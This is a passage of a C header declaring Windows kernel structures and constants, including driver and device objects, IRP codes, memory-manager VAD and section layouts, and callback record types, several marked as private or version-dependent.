#define FILE_DEVICE_VIRTUAL_BLOCK 0x00000053
#define FILE_DEVICE_POINT_OF_SERVICE 0x00000054
#define FILE_DEVICE_STORAGE_REPLICATION 0x00000055
#define FILE_DEVICE_TRUST_ENV 0x00000056
#define FILE_DEVICE_UCM 0x00000057
#define FILE_DEVICE_UCMTCPCI 0x00000058
#define FILE_DEVICE_PERSISTENT_MEMORY 0x00000059
#define FILE_DEVICE_NVDIMM 0x0000005a
#define FILE_DEVICE_HOLOGRAPHIC 0x0000005b
#define FILE_DEVICE_SDFXHCI 0x0000005c
#define FILE_DEVICE_UCMUCSI 0x0000005d
#define FILE_BYTE_ALIGNMENT 0x00000000
#define FILE_WORD_ALIGNMENT 0x00000001
#define FILE_LONG_ALIGNMENT 0x00000003
#define FILE_QUAD_ALIGNMENT 0x00000007
#define FILE_OCTA_ALIGNMENT 0x0000000f
#define FILE_32_BYTE_ALIGNMENT 0x0000001f
#define FILE_64_BYTE_ALIGNMENT 0x0000003f
#define FILE_128_BYTE_ALIGNMENT 0x0000007f
#define FILE_256_BYTE_ALIGNMENT 0x000000ff
#define FILE_512_BYTE_ALIGNMENT 0x000001ff
#define DPC_NORMAL 0
#define DPC_THREADED 1
#if _MSC_VER >= 1200
#pragma warning(push)
#pragma warning(disable:4324) // structure was padded due to __declspec(align())
#endif
typedef struct DECLSPEC_ALIGN(MEMORY_ALLOCATION_ALIGNMENT) _DEVICE_OBJECT {
CSHORT Type;
USHORT Size;
LONG ReferenceCount;
struct _DRIVER_OBJECT* DriverObject;
struct _DEVICE_OBJECT* NextDevice;
struct _DEVICE_OBJECT* AttachedDevice;
struct _IRP* CurrentIrp;
PIO_TIMER Timer;
ULONG Flags; // See above: DO_...
ULONG Characteristics; // See ntioapi: FILE_...
__volatile PVPB Vpb;
PVOID DeviceExtension;
DEVICE_TYPE DeviceType;
CCHAR StackSize;
union {
LIST_ENTRY ListEntry;
WAIT_CONTEXT_BLOCK Wcb;
} Queue;
ULONG AlignmentRequirement;
KDEVICE_QUEUE DeviceQueue;
KDPC Dpc;
//
// The following field is for exclusive use by the filesystem to keep
// track of the number of Fsp threads currently using the device
//
ULONG ActiveThreadCount;
PSECURITY_DESCRIPTOR SecurityDescriptor;
KEVENT DeviceLock;
USHORT SectorSize;
USHORT Spare1;
struct _DEVOBJ_EXTENSION* DeviceObjectExtension;
PVOID Reserved;
} DEVICE_OBJECT;
typedef struct _DEVICE_OBJECT* PDEVICE_OBJECT;
#if _MSC_VER >= 1200
#pragma warning(pop)
#endif
typedef struct _DEVOBJ_EXTENSION {
CSHORT Type;
USHORT Size;
//
// Public part of the DeviceObjectExtension structure
//
PDEVICE_OBJECT DeviceObject; // owning device object
// end_ntddk end_nthal end_ntifs end_wdm end_ntosp
//
// Universal Power Data - all device objects must have this
//
ULONG PowerFlags; // see ntos\po\pop.h
// WARNING: Access via PO macros
// and with PO locking rules ONLY.
//
// Pointer to the non-universal power data
// Power data that only some device objects need is stored in the
// device object power extension -> DOPE
// see po.h
//
struct _DEVICE_OBJECT_POWER_EXTENSION *Dope;
//
// power state information
//
//
// Device object extension flags. Protected by the IopDatabaseLock.
//
ULONG ExtensionFlags;
//
// PnP manager fields
//
PVOID DeviceNode;
//
// AttachedTo is a pointer to the device object that this device
// object is attached to. The attachment chain is now doubly
// linked: this pointer and DeviceObject->AttachedDevice provide the
// linkage.
//
PDEVICE_OBJECT AttachedTo;
//
// The next two fields are used to prevent recursion in IoStartNextPacket
// interfaces.
//
LONG StartIoCount; // Used to keep track of number of pending start ios.
LONG StartIoKey; // Next startio key
ULONG StartIoFlags; // Start Io Flags. Need a separate flag so that it can be accessed without locks
PVPB Vpb; // If not NULL contains the VPB of the mounted volume.
// Set in the filesystem's volume device object.
// This is a reverse VPB pointer.
// begin_ntddk begin_wdm begin_nthal begin_ntifs begin_ntosp
} DEVOBJ_EXTENSION, *PDEVOBJ_EXTENSION;
typedef struct _FAST_IO_DISPATCH {
ULONG SizeOfFastIoDispatch;
PVOID FastIoCheckIfPossible;
PVOID FastIoRead;
PVOID FastIoWrite;
PVOID FastIoQueryBasicInfo;
PVOID FastIoQueryStandardInfo;
PVOID FastIoLock;
PVOID FastIoUnlockSingle;
PVOID FastIoUnlockAll;
PVOID FastIoUnlockAllByKey;
PVOID FastIoDeviceControl;
PVOID AcquireFileForNtCreateSection;
PVOID ReleaseFileForNtCreateSection;
PVOID FastIoDetachDevice;
PVOID FastIoQueryNetworkOpenInfo;
PVOID AcquireForModWrite;
PVOID MdlRead;
PVOID MdlReadComplete;
PVOID PrepareMdlWrite;
PVOID MdlWriteComplete;
PVOID FastIoReadCompressed;
PVOID FastIoWriteCompressed;
PVOID MdlReadCompleteCompressed;
PVOID MdlWriteCompleteCompressed;
PVOID FastIoQueryOpen;
PVOID ReleaseForModWrite;
PVOID AcquireForCcFlush;
PVOID ReleaseForCcFlush;
} FAST_IO_DISPATCH, *PFAST_IO_DISPATCH;
#define IO_TYPE_ADAPTER 0x00000001
#define IO_TYPE_CONTROLLER 0x00000002
#define IO_TYPE_DEVICE 0x00000003
#define IO_TYPE_DRIVER 0x00000004
#define IO_TYPE_FILE 0x00000005
#define IO_TYPE_IRP 0x00000006
#define IO_TYPE_MASTER_ADAPTER 0x00000007
#define IO_TYPE_OPEN_PACKET 0x00000008
#define IO_TYPE_TIMER 0x00000009
#define IO_TYPE_VPB 0x0000000a
#define IO_TYPE_ERROR_LOG 0x0000000b
#define IO_TYPE_ERROR_MESSAGE 0x0000000c
#define IO_TYPE_DEVICE_OBJECT_EXTENSION 0x0000000d
#define IRP_MJ_CREATE 0x00
#define IRP_MJ_CREATE_NAMED_PIPE 0x01
#define IRP_MJ_CLOSE 0x02
#define IRP_MJ_READ 0x03
#define IRP_MJ_WRITE 0x04
#define IRP_MJ_QUERY_INFORMATION 0x05
#define IRP_MJ_SET_INFORMATION 0x06
#define IRP_MJ_QUERY_EA 0x07
#define IRP_MJ_SET_EA 0x08
#define IRP_MJ_FLUSH_BUFFERS 0x09
#define IRP_MJ_QUERY_VOLUME_INFORMATION 0x0a
#define IRP_MJ_SET_VOLUME_INFORMATION 0x0b
#define IRP_MJ_DIRECTORY_CONTROL 0x0c
#define IRP_MJ_FILE_SYSTEM_CONTROL 0x0d
#define IRP_MJ_DEVICE_CONTROL 0x0e
#define IRP_MJ_INTERNAL_DEVICE_CONTROL 0x0f
#define IRP_MJ_SHUTDOWN 0x10
#define IRP_MJ_LOCK_CONTROL 0x11
#define IRP_MJ_CLEANUP 0x12
#define IRP_MJ_CREATE_MAILSLOT 0x13
#define IRP_MJ_QUERY_SECURITY 0x14
#define IRP_MJ_SET_SECURITY 0x15
#define IRP_MJ_POWER 0x16
#define IRP_MJ_SYSTEM_CONTROL 0x17
#define IRP_MJ_DEVICE_CHANGE 0x18
#define IRP_MJ_QUERY_QUOTA 0x19
#define IRP_MJ_SET_QUOTA 0x1a
#define IRP_MJ_PNP 0x1b
#define IRP_MJ_PNP_POWER IRP_MJ_PNP
#define IRP_MJ_MAXIMUM_FUNCTION 0x1b
// Public structure
typedef struct _DRIVER_EXTENSION {
//
// Back pointer to Driver Object
//
struct _DRIVER_OBJECT *DriverObject;
//
// The AddDevice entry point is called by the Plug & Play manager
// to inform the driver when a new device instance arrives that this
// driver must control.
//
PVOID AddDevice;
//
// The count field is used to count the number of times the driver has
// had its registered reinitialization routine invoked.
//
ULONG Count;
//
// The service name field is used by the pnp manager to determine
// where the driver related info is stored in the registry.
//
UNICODE_STRING ServiceKeyName;
} DRIVER_EXTENSION, *PDRIVER_EXTENSION;
// Private, since 7.1
typedef struct _DRIVER_EXTENSION_V2 {
struct _DRIVER_OBJECT* DriverObject;
PVOID AddDevice;
ULONG Count;
UNICODE_STRING ServiceKeyName;
struct _IO_CLIENT_EXTENSION* ClientDriverExtension;
struct _FS_FILTER_CALLBACKS* FsFilterCallbacks;
} DRIVER_EXTENSION_V2, * PDRIVER_EXTENSION_V2;
// Private, since 8.0
typedef struct _DRIVER_EXTENSION_V3 {
struct _DRIVER_OBJECT* DriverObject;
PVOID AddDevice;
ULONG Count;
UNICODE_STRING ServiceKeyName;
struct _IO_CLIENT_EXTENSION* ClientDriverExtension;
struct _FS_FILTER_CALLBACKS* FsFilterCallbacks;
PVOID KseCallbacks; //KernelShimEngine
PVOID DvCallbacks; //DriverVerifier
} DRIVER_EXTENSION_V3, * PDRIVER_EXTENSION_V3;
// Private, since 8.1
typedef struct _DRIVER_EXTENSION_V4 {
struct _DRIVER_OBJECT* DriverObject;
PVOID AddDevice;
ULONG Count;
UNICODE_STRING ServiceKeyName;
struct _IO_CLIENT_EXTENSION* ClientDriverExtension;
struct _FS_FILTER_CALLBACKS* FsFilterCallbacks;
PVOID KseCallbacks; //KernelShimEngine
PVOID DvCallbacks; //DriverVerifier
PVOID VerifierContext;
} DRIVER_EXTENSION_V4, * PDRIVER_EXTENSION_V4;
// Private, since 11 25XXX
typedef struct _DRIVER_EXTENSION_V5 {
struct _DRIVER_OBJECT* DriverObject;
PVOID AddDevice;
ULONG Count;
UNICODE_STRING ServiceKeyName;
struct _IO_CLIENT_EXTENSION* ClientDriverExtension;
struct _FS_FILTER_CALLBACKS* FsFilterCallbacks;
PVOID KseCallbacks; //KernelShimEngine
PVOID DvCallbacks; //DriverVerifier
PVOID VerifierContext;
struct _DRIVER_PROXY_EXTENSION* DriverProxyExtension;
} DRIVER_EXTENSION_V5, * PDRIVER_EXTENSION_V5; /* size: 0x0058 */
#define DRVO_UNLOAD_INVOKED 0x00000001
#define DRVO_LEGACY_DRIVER 0x00000002
#define DRVO_BUILTIN_DRIVER 0x00000004 // Driver objects for Hal, PnP Mgr
#define DRVO_REINIT_REGISTERED 0x00000008
#define DRVO_INITIALIZED 0x00000010
#define DRVO_BOOTREINIT_REGISTERED 0x00000020
#define DRVO_LEGACY_RESOURCES 0x00000040
// end_ntddk end_nthal end_ntifs end_ntosp
#define DRVO_BASE_FILESYSTEM_DRIVER 0x00000080 // A driver that is at the bottom of the filesystem stack.
// begin_ntddk begin_nthal begin_ntifs begin_ntosp
typedef struct _DRIVER_OBJECT {
CSHORT Type;
CSHORT Size;
//
// The following links all of the devices created by a single driver
// together on a list, and the Flags word provides an extensible flag
// location for driver objects.
//
PDEVICE_OBJECT DeviceObject;
ULONG Flags;
//
// The following section describes where the driver is loaded. The count
// field is used to count the number of times the driver has had its
// registered reinitialization routine invoked.
//
PVOID DriverStart;
ULONG DriverSize;
PVOID DriverSection; //PLDR_DATA_TABLE_ENTRY
PDRIVER_EXTENSION DriverExtension;
//
// The driver name field is used by the error log thread
// determine the name of the driver that an I/O request is/was bound.
//
UNICODE_STRING DriverName;
//
// The following section is for registry support. Thise is a pointer
// to the path to the hardware information in the registry
//
PUNICODE_STRING HardwareDatabase;
//
// The following section contains the optional pointer to an array of
// alternate entry points to a driver for "fast I/O" support. Fast I/O
// is performed by invoking the driver routine directly with separate
// parameters, rather than using the standard IRP call mechanism. Note
// that these functions may only be used for synchronous I/O, and when
// the file is cached.
//
PFAST_IO_DISPATCH FastIoDispatch;
//
// The following section describes the entry points to this particular
// driver. Note that the major function dispatch table must be the last
// field in the object so that it remains extensible.
//
PVOID DriverInit;
PVOID DriverStartIo;
PVOID DriverUnload;
PVOID MajorFunction[IRP_MJ_MAXIMUM_FUNCTION + 1];
} DRIVER_OBJECT;
typedef struct _DRIVER_OBJECT *PDRIVER_OBJECT;
//
// The following structure is pointed to by the SectionObject pointer field
// of a file object, and is allocated by the various NT file systems.
//
typedef struct _SECTION_OBJECT_POINTERS {
PVOID DataSectionObject;
PVOID SharedCacheMap;
PVOID ImageSectionObject;
} SECTION_OBJECT_POINTERS;
typedef SECTION_OBJECT_POINTERS* PSECTION_OBJECT_POINTERS;
//
// Define the format of a completion message.
//
typedef struct _IO_COMPLETION_CONTEXT {
PVOID Port;
PVOID Key;
} IO_COMPLETION_CONTEXT, * PIO_COMPLETION_CONTEXT;
typedef struct _FILE_OBJECT {
CSHORT Type;
CSHORT Size;
PDEVICE_OBJECT DeviceObject;
PVPB Vpb;
PVOID FsContext;
PVOID FsContext2;
PSECTION_OBJECT_POINTERS SectionObjectPointer;
PVOID PrivateCacheMap;
NTSTATUS FinalStatus;
struct _FILE_OBJECT* RelatedFileObject;
BOOLEAN LockOperation;
BOOLEAN DeletePending;
BOOLEAN ReadAccess;
BOOLEAN WriteAccess;
BOOLEAN DeleteAccess;
BOOLEAN SharedRead;
BOOLEAN SharedWrite;
BOOLEAN SharedDelete;
ULONG Flags;
UNICODE_STRING FileName;
LARGE_INTEGER CurrentByteOffset;
__volatile ULONG Waiters;
__volatile ULONG Busy;
PVOID LastLock;
KEVENT Lock;
KEVENT Event;
__volatile PIO_COMPLETION_CONTEXT CompletionContext;
KSPIN_LOCK IrpListLock;
LIST_ENTRY IrpList;
__volatile PVOID FileObjectExtension;
} FILE_OBJECT;
typedef struct _FILE_OBJECT* PFILE_OBJECT;
typedef ULONG_PTR ERESOURCE_THREAD;
typedef ERESOURCE_THREAD* PERESOURCE_THREAD;
typedef struct _OWNER_ENTRY {
ERESOURCE_THREAD OwnerThread;
union {
LONG OwnerCount;
ULONG TableSize;
};
} OWNER_ENTRY, *POWNER_ENTRY;
typedef struct _ERESOURCE {
LIST_ENTRY SystemResourcesList;
POWNER_ENTRY OwnerTable;
SHORT ActiveCount;
USHORT Flag;
PKSEMAPHORE SharedWaiters;
PKEVENT ExclusiveWaiters;
OWNER_ENTRY OwnerThreads[2];
ULONG ContentionCount;
USHORT NumberOfSharedWaiters;
USHORT NumberOfExclusiveWaiters;
union {
PVOID Address;
ULONG_PTR CreatorBackTraceIndex;
};
KSPIN_LOCK SpinLock;
} ERESOURCE, *PERESOURCE;
/*
* WDM END
*/
/*
* MM START
*/
typedef ULONG MMSECTION_FLAGS2;
typedef struct _MMEXTEND_INFO {
ULONG_PTR CommittedSize;
ULONG ReferenceCount;
} MMEXTEND_INFO, * PMMEXTEND_INFO; /* size: 0x0010 */
//
// Flags definitions valid only for Windows 10.
//
typedef struct _MMSECTION_FLAGS {
struct {
UINT BeingDeleted : 1; /* bit position: 0 */
UINT BeingCreated : 1; /* bit position: 1 */
UINT BeingPurged : 1; /* bit position: 2 */
UINT NoModifiedWriting : 1; /* bit position: 3 */
UINT FailAllIo : 1; /* bit position: 4 */
UINT Image : 1; /* bit position: 5 */
UINT Based : 1; /* bit position: 6 */
UINT File : 1; /* bit position: 7 */
UINT AttemptingDelete : 1; /* bit position: 8 */
UINT PrefetchCreated : 1; /* bit position: 9 */
UINT PhysicalMemory : 1; /* bit position: 10 */
UINT ImageControlAreaOnRemovableMedia : 1; /* bit position: 11 */ //CopyOnWrite
UINT Reserve : 1; /* bit position: 12 */
UINT Commit : 1; /* bit position: 13 */
UINT NoChange : 1; /* bit position: 14 */
UINT WasPurged : 1; /* bit position: 15 */
UINT UserReference : 1; /* bit position: 16 */
UINT GlobalMemory : 1; /* bit position: 17 */
UINT DeleteOnClose : 1; /* bit position: 18 */
UINT FilePointerNull : 1; /* bit position: 19 */
UINT PreferredNode : 6; /* bit position: 20 */
UINT GlobalOnlyPerSession : 1; /* bit position: 26 */
UINT UserWritable : 1; /* bit position: 27 */
UINT SystemVaAllocated : 1; /* bit position: 28 */
UINT PreferredFsCompressionBoundary : 1; /* bit position: 29 */
UINT UsingFileExtents : 1; /* bit position: 30 */
UINT PageSize64K : 1; /* bit position: 31 */
};
} MMSECTION_FLAGS, * PMMSECTION_FLAGS; /* size: 0x0004 */
//
// Flags definitions valid only for Windows 10.
//
typedef struct _SEGMENT_FLAGS {
union {
struct {
USHORT TotalNumberOfPtes4132 : 10; /* bit position: 0 */
USHORT Spare0 : 2; /* bit position: 10 */
USHORT LargePages : 1; /* bit position: 12 */
USHORT DebugSymbolsLoaded : 1; /* bit position: 13 */
USHORT WriteCombined : 1; /* bit position: 14 */
USHORT NoCache : 1; /* bit position: 15 */
};
USHORT Short0;
}; /* size: 0x0002 */
union {
struct {
UCHAR FloppyMedia : 1; /* bit position: 0 */
UCHAR DefaultProtectionMask : 5; /* bit position: 1 */
UCHAR Binary32 : 1; /* bit position: 6 */
UCHAR ContainsDebug : 1; /* bit position: 7 */
};
UCHAR UChar1;
}; /* size: 0x0001 */
union {
struct {
UCHAR ForceCollision : 1; /* bit position: 0 */
UCHAR ImageSigningType : 3; /* bit position: 1 */
UCHAR ImageSigningLevel : 4; /* bit position: 4 */
};
UCHAR UChar2;
};
} SEGMENT_FLAGS, * PSEGMENT_FLAGS; /* size: 0x0004 */
typedef struct _MI_SYSTEM_CACHE_VIEW_ATTRIBUTES {
union {
ULONGLONG NumberOfPtes : 6;
ULONGLONG PartitionId : 10;
ULONGLONG Spare : 2;
ULONGLONG SectionOffset : 48;
} u1;
} MI_SYSTEM_CACHE_VIEW_ATTRIBUTES, * PMI_SYSTEM_CACHE_VIEW_ATTRIBUTES;
#define VIEW_MAP_TYPE_PROCESS 1
#define VIEW_MAP_TYPE_SESSION 2
#define VIEW_MAP_TYPE_SYSTEM_CACHE 3
typedef struct _MI_REVERSE_VIEW_MAP {
struct _LIST_ENTRY ViewLinks;
union {
VOID* SystemCacheVa;
VOID* SessionViewVa;
struct _EPROCESS* VadsProcess;
ULONG Type : 2;
} u1;
union {
struct _SUBSECTION* Subsection;
ULONG SubsectionType : 1;
} u2;
union {
struct _MI_SYSTEM_CACHE_VIEW_ATTRIBUTES SystemCacheAttributes;
ULONGLONG AllAttributes; //Since W11
ULONGLONG SectionOffset;
} u3;
} MI_REVERSE_VIEW_MAP, * PMI_REVERSE_VIEW_MAP; /* size: 0x0028 */
typedef struct _RTL_BALANCED_NODE {
union
{
struct _RTL_BALANCED_NODE* Children[2];
struct
{
struct _RTL_BALANCED_NODE* Left;
struct _RTL_BALANCED_NODE* Right;
};
};
union
{
UCHAR Red : 1;
UCHAR Balance : 2;
ULONG_PTR ParentValue;
};
} RTL_BALANCED_NODE, * PRTL_BALANCED_NODE;
typedef struct _SEGMENT {
struct _CONTROL_AREA* ControlArea;
unsigned long TotalNumberOfPtes;
SEGMENT_FLAGS SegmentFlags;
ULONG_PTR NumberOfCommittedPages;
ULONG_PTR SizeOfSegment;
union {
struct _MMEXTEND_INFO* ExtendInfo;
void* BasedAddress;
} u1;
EX_PUSH_LOCK SegmentLock;
union {
union {
ULONG_PTR ImageCommitment;
ULONG CreatingProcessId;
};
} u2;
union {
union {
struct _MI_SECTION_IMAGE_INFORMATION* ImageInformation;
void* FirstMappedVa;
};
} u3;
struct _MMPTE* PrototypePte;
} SEGMENT, * PSEGMENT; /* size: 0x0048 */
typedef struct _CONTROL_AREA_COMPAT {
SEGMENT* Segment;
LIST_ENTRY ListHead;
ULONG_PTR NumberOfSectionReferences;
ULONG_PTR NumberOfPfnReferences;
ULONG_PTR NumberOfMappedViews;
ULONG_PTR NumberOfUserReferences;
union {
union {
ULONG LongFlags;
MMSECTION_FLAGS Flags;
};
} u;
union {
union {
ULONG LongFlags;
MMSECTION_FLAGS2 Flags;
};
} u1;
EX_FAST_REF FilePointer;
volatile LONG ControlAreaLock;
ULONG ModifiedWriteCount;
struct _MI_CONTROL_AREA_WAIT_BLOCK* WaitList;
union
{
struct
{
union
{
ULONG NumberOfSystemCacheViews;
ULONG ImageRelocationStartBit;
};
union
{
volatile LONG WritableUserReferences;
struct // version dependent, this bitset is not valid for w11
{
unsigned long ImageRelocationSizeIn64k : 16; /* bit position: 0 */
unsigned long LargePage : 1; /* bit position: 16 */
unsigned long SystemImage : 1; /* bit position: 17 */
unsigned long StrongCode : 2; /* bit position: 18 */
unsigned long CantMove : 1; /* bit position: 20 */
unsigned long BitMap : 2; /* bit position: 21 */
unsigned long ImageActive : 1; /* bit position: 23 */
};
};
union
{
ULONG FlushInProgressCount;
ULONG NumberOfSubsections;
struct _MI_IMAGE_SECURITY_REFERENCE* SeImageStub;
};
} e2;
} u2;
//
// Incomplete definition, tail is version dependent.
//
} CONTROL_AREA_COMPAT, * PCONTROL_AREA_COMPAT;
//
// N.B.
// Only valid for Win10.
// Change between Win10 versions.
//
typedef struct _MMVAD_SHORT {
union
{
struct
{
struct _MMVAD_SHORT* NextVad;
void* ExtraCreateInfo;
};
struct _RTL_BALANCED_NODE VadNode;
};
ULONG StartingVpn;
ULONG EndingVpn;
UCHAR StartingVpnHigh;
UCHAR EndingVpnHigh;
UCHAR CommitChargeHigh;
UCHAR SpareNT64VadUChar;
LONG ReferenceCount;
EX_PUSH_LOCK PushLock;
ULONG LongFlags;
ULONG LongFlags1;
struct _MI_VAD_EVENT_BLOCK* EventList;
} MMVAD_SHORT, * PMMVAD_SHORT; /* size: 0x0040 */
typedef struct _MI_VAD_SEQUENTIAL_INFO {
struct {
#if defined(_AMD64_)
ULONG_PTR Length : 12; /* bit position: 0 */
ULONG_PTR Vpn : 52; /* bit position: 12 */
#else
ULONG Length : 11; /* bit position: 0 */
ULONG Vpn : 21; /* bit position: 11 */
#endif
};
} MI_VAD_SEQUENTIAL_INFO, * PMI_VAD_SEQUENTIAL_INFO;
//
// N.B.
// Only valid for Win10.
// Flags meanings change between Win10 versions.
//
typedef struct _MMVAD_FLAGS {
struct
{
ULONG VadType : 3; /* bit position: 0 */
ULONG Protection : 5; /* bit position: 3 */
ULONG PreferredNode : 6; /* bit position: 8 */
ULONG PrivateMemory : 1; /* bit position: 14 */
ULONG PrivateFixup : 1; /* bit position: 15 */
ULONG Enclave : 1; /* bit position: 16 */
ULONG PageSize64K : 1; /* bit position: 17 */
ULONG RfgControlStack : 1; /* bit position: 18 */
ULONG Spare : 8; /* bit position: 19 */
ULONG NoChange : 1; /* bit position: 27 */
ULONG ManySubsections : 1; /* bit position: 28 */
ULONG DeleteInProgress : 1; /* bit position: 29 */
ULONG LockContended : 1; /* bit position: 30 */
ULONG Lock : 1; /* bit position: 31 */
};
} MMVAD_FLAGS, * PMMVAD_FLAGS; /* size: 0x0004 */
//
// N.B.
// Only valid for Win10.
// Flags meanings change between Win10 versions.
//
typedef struct _MMVAD_FLAGS1 {
struct
{
ULONG CommitCharge : 31; /* bit position: 0 */
ULONG MemCommit : 1; /* bit position: 31 */
};
} MMVAD_FLAGS1, * PMMVAD_FLAGS1; /* size: 0x0004 */
//
// N.B.
// Only valid for Win10.
// Flags meanings change between Win10 versions.
//
typedef struct _MMVAD_FLAGS2 {
struct
{
ULONG FileOffset : 24; /* bit position: 0 */
ULONG Large : 1; /* bit position: 24 */
ULONG TrimBehind : 1; /* bit position: 25 */
ULONG Inherit : 1; /* bit position: 26 */
ULONG NoValidationNeeded : 1; /* bit position: 27 */
ULONG PrivateDemandZero : 1; /* bit position: 28 */
ULONG Spare : 3; /* bit position: 29 */
};
} MMVAD_FLAGS2, * PMMVAD_FLAGS2; /* size: 0x0004 */
typedef struct _MMVAD {
struct _MMVAD_SHORT Core;
union
{
union
{
ULONG LongFlags2;
volatile struct _MMVAD_FLAGS2 VadFlags2;
};
} u2;
struct _SUBSECTION* Subsection;
struct _MMPTE* FirstPrototypePte;
struct _MMPTE* LastContiguousPte;
LIST_ENTRY ViewLinks;
struct _EPROCESS* VadsProcess;
union
{
union
{
struct _MI_VAD_SEQUENTIAL_INFO SequentialVa;
struct _MMEXTEND_INFO* ExtendedInfo;
};
} u4;
FILE_OBJECT* FileObject;
} MMVAD, * PMMVAD; /* size: 0x0088 */
typedef struct _MMVIEW {
ULONGLONG Entry;
union {
ULONGLONG Writable : 1;
struct _CONTROL_AREA* ControlArea;
};
LIST_ENTRY ViewLinks;
PVOID SessionViewVa;
ULONG SessionId;
} MMVIEW, *PMMVIEW;
typedef struct _MI_IMAGE_ENTRY_IN_SESSION {
LIST_ENTRY Link;
PVOID Address;
//
// Incomplete and incorrect.
//
} MI_IMAGE_ENTRY_IN_SESSION, * PMI_IMAGE_ENTRY_IN_SESSION;
typedef struct _SUBSECTION_COMPAT {
struct _CONTROL_AREA* ControlArea;
struct _MMPTE* SubsectionBase;
struct _SUBSECTION* NextSubsection;
//
// Incomplete definition.
//
} SUBSECTION_COMPAT, * PSUBSECTION_COMPAT;
//
// This is Windows 10 only Section Object definition.
//
// N.B. It completely differs from anything else.
//
typedef struct _SECTION_COMPAT {
RTL_BALANCED_NODE SectionNode;
ULONG_PTR StartingVpn;
ULONG_PTR EndingVpn;
union {
union {
struct _CONTROL_AREA* ControlArea;
struct _FILE_OBJECT* FileObject;
struct {
ULONG_PTR RemoteImageFileObject : 1; /* bit position: 0 */
ULONG_PTR RemoteDataFileObject : 1; /* bit position: 1 */
};
};
} u1;
ULONG_PTR SizeOfSection;
union {
ULONG LongFlags;
MMSECTION_FLAGS Flags;
} u;
struct {
ULONG InitialPageProtection : 12; /* bit position: 0 */
ULONG SessionId : 19; /* bit position: 12 */
ULONG NoValidationNeeded : 1; /* bit position: 31 */
};
} SECTION_COMPAT, * PSECTION_COMPAT; /* size: 0x0040 */
/*
* MM END
*/
/*
* Configuration Manager control vector
*/
typedef struct _CM_SYSTEM_CONTROL_VECTOR_V1 {
PWSTR KeyPath;
PWSTR ValueName;
PVOID Buffer;
PULONG BufferLength;
PULONG Type;
} CM_SYSTEM_CONTROL_VECTOR_V1, * PCM_SYSTEM_CONTROL_VECTOR_V1;
//
// Since Windows 10 RS4
//
typedef struct _CM_SYSTEM_CONTROL_VECTOR_V2 {
PWSTR KeyPath;
PWSTR ValueName;
PVOID Buffer;
PULONG BufferLength;
PULONG Type;
ULONG Flags; //0 or 1 depends on flag from LOADER_PARAMETER_BLOCK attached hives
ULONG Spare0;
} CM_SYSTEM_CONTROL_VECTOR_V2, * PCM_SYSTEM_CONTROL_VECTOR_V2;
/*
** Callbacks START
*/
typedef NTSTATUS(*PEX_CALLBACK_FUNCTION) (
IN PVOID CallbackContext,
IN PVOID Argument1,
IN PVOID Argument2
);
typedef VOID(NTAPI* PEX_HOST_NOTIFICATION) (
_In_ ULONG NotificationType,
_In_opt_ PVOID Context);
typedef struct _EX_EXTENSION_INFORMATION_V1 {
USHORT Id;
USHORT Version;
USHORT FunctionCount;
} EX_EXTENSION_INFORMATION_V1, * PEX_EXTENSION_INFORMATION_V1;
typedef struct _EX_EXTENSION_VERSION {
USHORT MajorVersion;
USHORT MinorVersion;
} EX_EXTENSION_VERSION, * PEX_EXTENSION_VERSION;
typedef struct _EX_EXTENSION_INFORMATION_V2 {
USHORT Id;
EX_EXTENSION_VERSION Version;
USHORT FunctionCount;
} EX_EXTENSION_INFORMATION_V2, * PEX_EXTENSION_INFORMATION_V2;
typedef struct _EX_HOST_TABLE {
EX_EXTENSION_INFORMATION_V2 HostInformation;
PVOID FunctionTable; //calbacks
} EX_HOST_TABLE, * PEX_HOST_TABLE;
typedef struct _EX_HOST_PARAMS {
EX_EXTENSION_INFORMATION_V1 HostInformation;
POOL_TYPE PoolType;
PVOID HostTable;
PVOID NotificationRoutine;
PVOID NotificationContext;
} EX_HOST_PARAMS, * PEX_HOST_PARAMS;
typedef struct _EX_HOST_ENTRY_V1 {
LIST_ENTRY ListEntry;
LONG RefCounter;
EX_HOST_PARAMS HostParameters;
EX_RUNDOWN_REF RundownProtection;
EX_PUSH_LOCK PushLock;
PVOID FunctionTable; //callbacks
ULONG Flags;
} EX_HOST_ENTRY_V1, * PEX_HOST_ENTRY_V1;
typedef struct _EX_HOST_ENTRY_V2 {
LIST_ENTRY ListEntry;
EX_EXTENSION_INFORMATION_V2 HostInformation;
ULONG64 RefCounter;
EX_PUSH_LOCK PushLock;
PEX_HOST_TABLE HostTablesPtr;
USHORT HostTablesCount;
PEX_HOST_TABLE CurrentHostTableEntry; //only set when an extension registers
PVOID NotificationRoutine;
PVOID NotificationContext;
EX_EXTENSION_VERSION ExtensionVersion;
EX_RUNDOWN_REF RundownProtection;
PVOID FunctionTable;
USHORT ExtensionTableFunctionCount;
ULONG Pad;
ULONG Flags;
EX_HOST_TABLE HostTables[1];
} EX_HOST_ENTRY_V2, * PEX_HOST_ENTRY_V2;
typedef struct _EX_EXTENSION_REGISTRATION {
EX_EXTENSION_INFORMATION_V1 Information;
PVOID FunctionTable;
PVOID* HostTable;
PDRIVER_OBJECT DriverObject;
} EX_EXTENSION_REGISTRATION, * PEX_EXTENSION_REGISTRATION;
typedef struct _EX_CALLBACK {
EX_FAST_REF RoutineBlock;
} EX_CALLBACK, *PEX_CALLBACK;
typedef struct _EX_CALLBACK_ROUTINE_BLOCK {
EX_RUNDOWN_REF RundownProtect;
PVOID Function; //PEX_CALLBACK_FUNCTION
PVOID Context;
} EX_CALLBACK_ROUTINE_BLOCK, *PEX_CALLBACK_ROUTINE_BLOCK;
typedef struct _KBUGCHECK_CALLBACK_RECORD {
LIST_ENTRY Entry;
PVOID CallbackRoutine;
PVOID Buffer;
ULONG Length;
PUCHAR Component;
ULONG_PTR Checksum;
UCHAR State;
} KBUGCHECK_CALLBACK_RECORD, *PKBUGCHECK_CALLBACK_RECORD;
typedef enum _KBUGCHECK_CALLBACK_REASON {
KbCallbackInvalid,
KbCallbackReserved1,
KbCallbackSecondaryDumpData,
KbCallbackDumpIo,
KbCallbackAddPages,
KbCallbackSecondaryMultiPartDumpData,
KbCallbackRemovePages,
KbCallbackTriageDumpData
} KBUGCHECK_CALLBACK_REASON;
typedef struct _KBUGCHECK_REASON_CALLBACK_RECORD {
LIST_ENTRY Entry;
PVOID CallbackRoutine;
PUCHAR Component;
ULONG_PTR Checksum;
KBUGCHECK_CALLBACK_REASON Reason;
UCHAR State;
} KBUGCHECK_REASON_CALLBACK_RECORD, *PKBUGCHECK_REASON_CALLBACK_RECORD;
typedef struct _CM_CALLBACK_CONTEXT_BLOCK {
LIST_ENTRY CallbackListEntry;
LONG PreCallListHead;
